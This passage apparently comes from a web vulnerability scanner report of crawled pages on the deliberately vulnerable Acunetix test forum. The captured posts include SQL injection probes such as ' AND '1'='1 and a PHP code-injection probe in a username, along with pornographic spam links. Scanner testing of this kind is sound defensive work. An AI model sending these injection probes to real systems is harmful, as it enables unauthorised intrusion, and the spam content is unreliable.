vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4138 |
| Response Body - size: 4,138 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>${@print(md5(31337))}\</b> on 3/14/2022 4:18:48 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 54.208.242.36</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4374 |
| Response Body - size: 4,374 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Shemale Sexy Galleries </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Shemale Sexy Galleries </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ineshy11</b> on 3/14/2022 6:42:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Shemale Sexy Galleries - 185.107.47.171</div><div class='posttext'>Enjoy daily galleries http://gay.porn.porn.miyuhot.com/?amara allentown pa highschool porn ebony male porn biggest list of porn asian free videos porn free lesbian hot women porn video </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4491 |
| Response Body - size: 4,491 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL 